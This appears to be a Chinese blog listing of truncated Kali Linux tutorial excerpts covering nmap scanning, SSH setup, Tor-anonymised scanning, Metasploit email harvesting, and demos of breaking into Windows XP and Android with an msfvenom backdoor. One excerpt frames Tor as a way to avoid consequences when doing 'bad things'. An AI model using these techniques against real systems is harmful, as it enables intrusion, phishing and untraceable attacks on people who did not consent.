Kali Linux：使用nmap扫描主机

nmap－Network Mapper，是著名的网络扫描和嗅探工具包。他同样支持Windows和OS X。扫描开放端口和判断操作系统类型先让我们ping一段地址范围，找到启动的主机：# nmap -sP 159.203.205.0-100使用SYN扫描探测操作系统类型：# nmap -sS 159.

Kali Linux安装SSH Server

Kali Linux默认并没有安装SSH服务，为了实现远程登录Kali Linux，我们需要安装SSH服务。安装 OpenSSH Server# apt-get install openssh-server配置SSH服务开机启动# update-rc.d -f ssh remove# update-

使用tor实现匿名扫描/SSH登录

你要做坏事时，最先应该想到匿名。扫描网站／主机，或利用漏洞；甚至在大天朝发帖都有风险，为了防止半夜鬼敲门，我们可以使用tor实现匿名。如果你不知道tor是什么，看：https://zh.wikipedia.org/wiki/Tor ； https://program-think.blogspot.c

使用Metasploit收集邮箱信息

Metasploit提供了很多辅助的模块，非常实用。今天介绍一个叫search_email_collector的模块，它的功能是查找搜索引擎（google、bing、yahoo），收集和某个域名有关的邮箱地址。使用步骤：启动msfconsole：# service postgresql start#

安装使用lynis扫描Linux的安全漏洞

Lynis是Linux平台上的一款安全漏洞扫描工具。它可以扫描系统的安全漏洞、收集系统信息、安装的软件信息、配置问题、没有设置密码的用户和防火墙等等。Lynis是流行可靠的安全扫描工具。前不久，Lynis更新了版本，Lynis发布了2.2.0。在这个版本上增加了新的特性和一些小的功能提升。我建议使用

Metasploit的基本使用

Metasploit可以在Linux、Windows和Mac OS X系统上运行。我假设你已安装了Metasploit，或者你使用的系统是Kali Linux。它有命令行接口也有GUI接口。我使用的系统是Kali Linux，本文以这个系统为例。图形用户界面接口：Armitage命令行接口：msfc

演示使用Metasploit入侵Windows

我使用Kali Linux的IP地址是192.168.0.112；在同一局域网内有一台运行Windows XP（192.168.0.108）的测试电脑。本文演示怎么使用Metasploit入侵windows xp sp3。启动msfconsole：# msfconsole选择一个漏洞：msf >

演示使用Metasploit入侵Android

文本演示怎么使用Kali Linux入侵Android手机。Kali Linux IP地址：192.168.0.112；接收连接的端口：443。同一局域网内android手机一部(android 5.1)创建一个后门程序在终端中执行：# msfvenom -p android/meterpreter